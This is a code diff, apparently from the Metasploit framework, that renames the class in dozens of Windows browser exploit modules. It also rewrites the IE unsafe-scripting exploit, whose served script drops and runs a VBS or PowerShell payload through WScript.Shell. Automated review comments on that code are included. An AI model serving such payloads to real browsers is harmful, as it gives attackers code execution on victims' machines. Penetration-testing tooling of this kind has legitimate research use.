index 78466bd120..5b35ecdef3 100644
--- a/modules/exploits/windows/browser/cisco_playerpt_setsource.rb +++ b/modules/exploits/windows/browser/cisco_playerpt_setsource.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb b/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb index 814fc873d2..199c27944b 100644 --- a/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb +++ b/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/citrix_gateway_actx.rb b/modules/exploits/windows/browser/citrix_gateway_actx.rb index 663b4945a0..58182c0a10 100644 --- a/modules/exploits/windows/browser/citrix_gateway_actx.rb +++ b/modules/exploits/windows/browser/citrix_gateway_actx.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/clear_quest_cqole.rb b/modules/exploits/windows/browser/clear_quest_cqole.rb index e9a1aced93..affe99692b 100644 --- a/modules/exploits/windows/browser/clear_quest_cqole.rb +++ b/modules/exploits/windows/browser/clear_quest_cqole.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/communicrypt_mail_activex.rb b/modules/exploits/windows/browser/communicrypt_mail_activex.rb index 3efacb9c49..d8f0fde955 100644 
--- a/modules/exploits/windows/browser/communicrypt_mail_activex.rb +++ b/modules/exploits/windows/browser/communicrypt_mail_activex.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/creative_software_cachefolder.rb b/modules/exploits/windows/browser/creative_software_cachefolder.rb index 37adc9b873..f67dc5fa41 100644 --- a/modules/exploits/windows/browser/creative_software_cachefolder.rb +++ b/modules/exploits/windows/browser/creative_software_cachefolder.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/crystal_reports_printcontrol.rb b/modules/exploits/windows/browser/crystal_reports_printcontrol.rb index a92886b94d..44636c8495 100644 --- a/modules/exploits/windows/browser/crystal_reports_printcontrol.rb +++ b/modules/exploits/windows/browser/crystal_reports_printcontrol.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/dell_webcam_crazytalk.rb b/modules/exploits/windows/browser/dell_webcam_crazytalk.rb index fe8ede5cbd..f70773b7a5 100644 --- a/modules/exploits/windows/browser/dell_webcam_crazytalk.rb +++ b/modules/exploits/windows/browser/dell_webcam_crazytalk.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML 
diff --git a/modules/exploits/windows/browser/dxstudio_player_exec.rb b/modules/exploits/windows/browser/dxstudio_player_exec.rb index 1b5560873d..fe938e1872 100644 --- a/modules/exploits/windows/browser/dxstudio_player_exec.rb +++ b/modules/exploits/windows/browser/dxstudio_player_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ea_checkrequirements.rb b/modules/exploits/windows/browser/ea_checkrequirements.rb index 4ab495e851..89936e7a39 100644 --- a/modules/exploits/windows/browser/ea_checkrequirements.rb +++ b/modules/exploits/windows/browser/ea_checkrequirements.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb b/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb index 921285149b..ab90c7164f 100644 --- a/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb +++ b/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/enjoysapgui_comp_download.rb b/modules/exploits/windows/browser/enjoysapgui_comp_download.rb index 3d3cdf9c3c..0333976af5 100644 --- a/modules/exploits/windows/browser/enjoysapgui_comp_download.rb +++ b/modules/exploits/windows/browser/enjoysapgui_comp_download.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb b/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb index a45a935ef6..2ee2ccff3b 100644 --- a/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb +++ b/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/facebook_extractiptc.rb b/modules/exploits/windows/browser/facebook_extractiptc.rb index 7290b5d166..571769f23d 100644 --- a/modules/exploits/windows/browser/facebook_extractiptc.rb +++ b/modules/exploits/windows/browser/facebook_extractiptc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb index 66f3e99668..5f083c52da 100644 --- a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb +++ b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/getgodm_http_response_bof.rb b/modules/exploits/windows/browser/getgodm_http_response_bof.rb index 28762797c1..1adf60aa07 100644 --- a/modules/exploits/windows/browser/getgodm_http_response_bof.rb +++ b/modules/exploits/windows/browser/getgodm_http_response_bof.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Seh diff --git a/modules/exploits/windows/browser/gom_openurl.rb b/modules/exploits/windows/browser/gom_openurl.rb index 1850394ce0..fe60d15fc8 100644 --- a/modules/exploits/windows/browser/gom_openurl.rb +++ b/modules/exploits/windows/browser/gom_openurl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/greendam_url.rb b/modules/exploits/windows/browser/greendam_url.rb index a3394b541b..ee7e2634fe 100644 --- a/modules/exploits/windows/browser/greendam_url.rb +++ b/modules/exploits/windows/browser/greendam_url.rb @@ -21,7 +21,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb b/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb index ec3f7c8ed2..34a7758163 100644 --- a/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb +++ b/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/honeywell_tema_exec.rb b/modules/exploits/windows/browser/honeywell_tema_exec.rb index 13fa3b651c..4ce1c99493 100644 --- a/modules/exploits/windows/browser/honeywell_tema_exec.rb +++ b/modules/exploits/windows/browser/honeywell_tema_exec.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb b/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb index 550395255f..efa03912ab 100644 --- a/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb +++ b/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb b/modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb index 55850db2a5..d6cbb5275a 100644 --- a/modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb +++ b/modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb b/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb index 9276a059e5..9cb5e338c4 100644 --- a/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb +++ b/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/hp_loadrunner_addfile.rb b/modules/exploits/windows/browser/hp_loadrunner_addfile.rb index bc4efcd457..82ed60807c 100644 
--- a/modules/exploits/windows/browser/hp_loadrunner_addfile.rb +++ b/modules/exploits/windows/browser/hp_loadrunner_addfile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb b/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb index 5b907dc8a2..09b0439c0c 100644 --- a/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb +++ b/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb b/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb index e3d390f8eb..acff38f9ed 100644 --- a/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb +++ b/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb b/modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb index 5c62ea02a1..6488beed3a 100644 --- a/modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb +++ b/modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML 
diff --git a/modules/exploits/windows/browser/hpmqc_progcolor.rb b/modules/exploits/windows/browser/hpmqc_progcolor.rb index dd64b699b0..19f0929c35 100644 --- a/modules/exploits/windows/browser/hpmqc_progcolor.rb +++ b/modules/exploits/windows/browser/hpmqc_progcolor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb b/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb index a56df9c525..873b2b876d 100644 --- a/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb +++ b/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking # heap spray :-/ include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ibm_spss_c1sizer.rb b/modules/exploits/windows/browser/ibm_spss_c1sizer.rb index a8488b29d4..76261ed22b 100644 --- a/modules/exploits/windows/browser/ibm_spss_c1sizer.rb +++ b/modules/exploits/windows/browser/ibm_spss_c1sizer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb b/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb index 772a924e42..1f261d420a 100644 --- a/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb +++ b/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML 
diff --git a/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb b/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb index f16b3b4c58..49dc3318e4 100644 --- a/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb +++ b/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb b/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb index c966b6145b..88ea81859f 100644 --- a/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb +++ b/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ie_cbutton_uaf.rb b/modules/exploits/windows/browser/ie_cbutton_uaf.rb index 96a4f7cfc7..e002ede87f 100644 --- a/modules/exploits/windows/browser/ie_cbutton_uaf.rb +++ b/modules/exploits/windows/browser/ie_cbutton_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb b/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb index 96741d004e..d00bae6af6 100644 --- a/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb +++ b/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML 
diff --git a/modules/exploits/windows/browser/ie_createobject.rb b/modules/exploits/windows/browser/ie_createobject.rb index 4b49aa83b6..7481aebffb 100644 --- a/modules/exploits/windows/browser/ie_createobject.rb +++ b/modules/exploits/windows/browser/ie_createobject.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ie_execcommand_uaf.rb b/modules/exploits/windows/browser/ie_execcommand_uaf.rb index 6db53caf87..bad5533df1 100644 --- a/modules/exploits/windows/browser/ie_execcommand_uaf.rb +++ b/modules/exploits/windows/browser/ie_execcommand_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ie_iscomponentinstalled.rb b/modules/exploits/windows/browser/ie_iscomponentinstalled.rb index 09d208386c..1e498607a4 100644 --- a/modules/exploits/windows/browser/ie_iscomponentinstalled.rb +++ b/modules/exploits/windows/browser/ie_iscomponentinstalled.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Seh diff --git a/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb b/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb index 1be71a45b7..6c8d41af0e 100644 --- a/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb +++ b/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer 
diff --git a/modules/exploits/windows/browser/ie_unsafe_scripting.rb b/modules/exploits/windows/browser/ie_unsafe_scripting.rb index caab7e277b..3db44238f6 100644 --- a/modules/exploits/windows/browser/ie_unsafe_scripting.rb +++ b/modules/exploits/windows/browser/ie_unsafe_scripting.rb @@ -7,17 +7,27 @@ require 'msf/core' require 'msf/util/exe' require 'msf/core/exploit/powershell' -class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking +class MetasploitModule < Msf::Exploit::Remote - include Msf::Exploit::Remote::HttpServer::HTML + Rank = ManualRanking + + include Msf::Exploit::Remote::BrowserExploitServer include Msf::Exploit::EXE include Msf::Exploit::Powershell + VULN_CHECK_JS = %Q| + try { + new ActiveXObject("WScript.Shell"); + new ActiveXObject("Scripting.FileSystemObject"); + is_vuln = true; + } catch(e) {} + | + + def initialize(info = {}) super(update_info(info, - 'Name' => 'Microsoft Internet Explorer Unsafe Scripting Misconfiguration', - 'Description' => %q{ + 'Name' => 'Microsoft Internet Explorer Unsafe Scripting Misconfiguration', + 'Description' => %q{ This exploit takes advantage of the "Initialize and script ActiveX controls not marked safe for scripting" setting within Internet Explorer. When this option is set, IE allows access to the WScript.Shell ActiveX control, which allows javascript to 
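Review bot: `VULN_CHECK_JS` assigns `is_vuln` without declaring it, and nothing in this hunk says where that variable comes from or who reads it. Presumably the detection script of the newly included `BrowserExploitServer` mixin declares it, but that is not visible here. A comment above the constant would make the contract explicit, for example `# Evaluated in the client during profiling; sets is_vuln only when both ActiveX objects can be created.` The literal has no interpolation, so `%q|...|.freeze` would be tighter than a mutable `%Q` constant. The drop from `ExcellentRanking` to `ManualRanking` also deserves a one-line comment next to `Rank` giving the reason. The `initialize` body continues outside this hunk.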
@@ -36,43 +46,77 @@ class Metasploit3 < Msf::Exploit::Remote IE Tabs, WScript and subsequent Powershell prompts all run as x86 even when run from an x64 iexplore.exe. + + By default, this module will not attempt to fire against IEs that come with Protected + Mode enabled by default, because it can trigger a security prompt. However, if you are + feeling brave, you can choose to ignore this restriction by setting the ALLOWPROMPT + datastore option to true. }, - 'License' => MSF_LICENSE, - 'Author' => + 'License' => MSF_LICENSE, + 'Author' => [ 'natron', 'Ben Campbell' # PSH and remove ADODB.Stream ], - 'References' => + 'References' => [ [ 'URL', 'http://support.microsoft.com/kb/182569' ], [ 'URL', 'http://blog.invisibledenizen.org/2009/01/ieunsafescripting-metasploit-module.html' ], [ 'URL', 'http://support.microsoft.com/kb/870669'] ], - 'DisclosureDate' => 'Sep 20 2010', - 'Platform' => 'win', - 'Targets' => + 'DisclosureDate' => 'Sep 20 2010', + 'Platform' => 'win', + 'BrowserRequirements' => { + source: 'script', + os_name: OperatingSystems::Match::WINDOWS, + ua_name: HttpClients::IE, + vuln_test: VULN_CHECK_JS, + vuln_test_error: 'WScript.Shell or Scripting.FileSystemObject not allowed by browser.' 
+ }, + 'Arch' => ARCH_X86, + 'Targets' => [ - [ 'Windows x86/x64', { 'Arch' => ARCH_X86 } ] + [ 'Windows x86/x64', {} ] ], - 'DefaultOptions' => + 'DefaultOptions' => { 'HTTP::compression' => 'gzip' }, - 'DefaultTarget' => 0)) + 'DefaultTarget' => 0 + )) register_options( [ - OptEnum.new('TECHNIQUE', [true, 'Delivery technique (VBS Exe Drop or PSH CMD)', 'VBS', ['VBS','Powershell']]), + OptBool.new('ALLOWPROMPT', [true, 'Allow exploit to ignore the protected mode prompt', false]), + OptEnum.new('TECHNIQUE', [true, 'Delivery technique (VBS Exe Drop or PSH CMD)', 'VBS', ['VBS','Powershell']]) ], self.class ) end - def on_request_uri(cli, request) + # Unfortunately we don't currently have an explicit way to check whether Protected Mode is + # actually enabled or not, so we can only rely on whatever is default on the OS. This should + # allow BAP2 to always fire without worrying about the prmopt popping up, but the user can + # still ignore this by setting ALLOWPROMPT to true in standalone mode. + def has_protected_mode_prompt?(browser) + if datastore['ALLOWPROMPT'] + return false + elsif OperatingSystems::Match::WINDOWS_XP === browser[:os_name] + return false + end + + true + end + + def on_request_exploit(cli, request, browser) + if has_protected_mode_prompt?(browser) + print_warning("This target possibly has Protected Mode, exploit aborted.") + send_not_found(cli) + return + end # Build out the HTML response page - var_shellobj = rand_text_alpha(rand(5)+5) + var_shellobj = rand_text_alpha(rand(5)+5) p = regenerate_payload(cli) if datastore['TECHNIQUE'] == 'VBS' 
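Review bot: `has_protected_mode_prompt?` returns false whenever `ALLOWPROMPT` is set, so it answers "should this request be refused" rather than what its name claims. Its comment also misspells "prompt" as `prmopt`. Keeping the predicate about the client only, with the body `!(OperatingSystems::Match::WINDOWS_XP === browser[:os_name])`, and moving the operator override to the caller as `if !datastore['ALLOWPROMPT'] && has_protected_mode_prompt?(browser)` separates the heuristic from the policy decision. The comment should also say plainly that the check is an OS-name heuristic, so every non-XP client is refused by default. `on_request_exploit` continues past the end of this hunk.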
@@ -92,10 +136,10 @@ class Metasploit3 < Msf::Exploit::Remote end def vbs_technique(var_shellobj, p) - var_fsobj = rand_text_alpha(rand(5)+5) - var_fsobj_file = rand_text_alpha(rand(5)+5) - var_vbsname = rand_text_alpha(rand(5)+5) - var_writedir = rand_text_alpha(rand(5)+5) + var_fsobj = rand_text_alpha(rand(5)+5) + var_fsobj_file = rand_text_alpha(rand(5)+5) + var_vbsname = rand_text_alpha(rand(5)+5) + var_writedir = rand_text_alpha(rand(5)+5) exe = generate_payload_exe({ :code => p.encoded }) vbs = Msf::Util::EXE.to_exe_vbs(exe) @@ -103,7 +147,7 @@ class Metasploit3 < Msf::Exploit::Remote # Build the javascript that will be served js_content = %Q| -//<html><head></head><body><script> +<html><head></head><body><script> var #{var_shellobj} = new ActiveXObject("WScript.Shell"); var #{var_fsobj} = new ActiveXObject("Scripting.FileSystemObject"); var #{var_writedir} = #{var_shellobj}.ExpandEnvironmentStrings("%TEMP%"); @@ -114,20 +158,20 @@ var #{var_fsobj_file} = #{var_fsobj}.OpenTextFile(#{var_writedir} + "\\\\" + "#{ #{var_shellobj}.run("wscript.exe " + #{var_writedir} + "\\\\" + "#{var_vbsname}.vbs", 1, true); #{var_fsobj}.DeleteFile(#{var_writedir} + "\\\\" + "#{var_vbsname}.vbs"); -//</script></html> +</script></html> | - return js_content + js_content end def psh_technique(var_shellobj, p) cmd = Rex::Text.to_hex(cmd_psh_payload(payload.encoded, payload_instance.arch.first)) js_content = %Q| -//<html><head></head><body><script> +<html><head></head><body><script> var #{var_shellobj} = new ActiveXObject("WScript.Shell"); #{var_shellobj}.run(unescape("#{cmd}"), 1, true); -//</script></html> +</script></html> | - return js_content + js_content end end diff --git a/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb b/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb index fa0e081109..26459acef3 100644 --- a/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb 
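Review bot: The context comment `# Build the javascript that will be served` and the local name `js_content` are stale in `vbs_technique` (hunk at -103) now that the `//` prefixes are gone, because the string is a complete HTML document rather than a script body. The same applies to `js_content` in `psh_technique` (hunk at -114). I would update the comment to `# Build the HTML page (with inline script) that will be served` and rename the local to something like `html` in both methods. Both method bodies begin outside the hunks shown, so the rename needs checking against the unchanged lines.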
+++ b/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'false', + 'DisablePayloadHandler' => false, 'InitialAutoRunScript' => 'migrate -f' }, 'Payload' => diff --git a/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb b/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb index 8abc7a8ae0..0a0583a308 100644 --- a/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb +++ b/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/inotes_dwa85w_bof.rb b/modules/exploits/windows/browser/inotes_dwa85w_bof.rb index d9bc4a1265..66e44e1579 100644 --- a/modules/exploits/windows/browser/inotes_dwa85w_bof.rb +++ b/modules/exploits/windows/browser/inotes_dwa85w_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/intrust_annotatex_add.rb b/modules/exploits/windows/browser/intrust_annotatex_add.rb index 9456b7d5b6..3f626ef961 100644 --- a/modules/exploits/windows/browser/intrust_annotatex_add.rb +++ b/modules/exploits/windows/browser/intrust_annotatex_add.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/java_basicservice_impl.rb b/modules/exploits/windows/browser/java_basicservice_impl.rb index 3e75330b62..dce454f29d 100644 --- a/modules/exploits/windows/browser/java_basicservice_impl.rb +++ b/modules/exploits/windows/browser/java_basicservice_impl.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer diff --git a/modules/exploits/windows/browser/java_cmm.rb b/modules/exploits/windows/browser/java_cmm.rb index 7ca72c586c..dd6140d2f9 100644 --- a/modules/exploits/windows/browser/java_cmm.rb +++ b/modules/exploits/windows/browser/java_cmm.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/java_codebase_trust.rb b/modules/exploits/windows/browser/java_codebase_trust.rb index cc88830088..1d3e0e9eea 100644 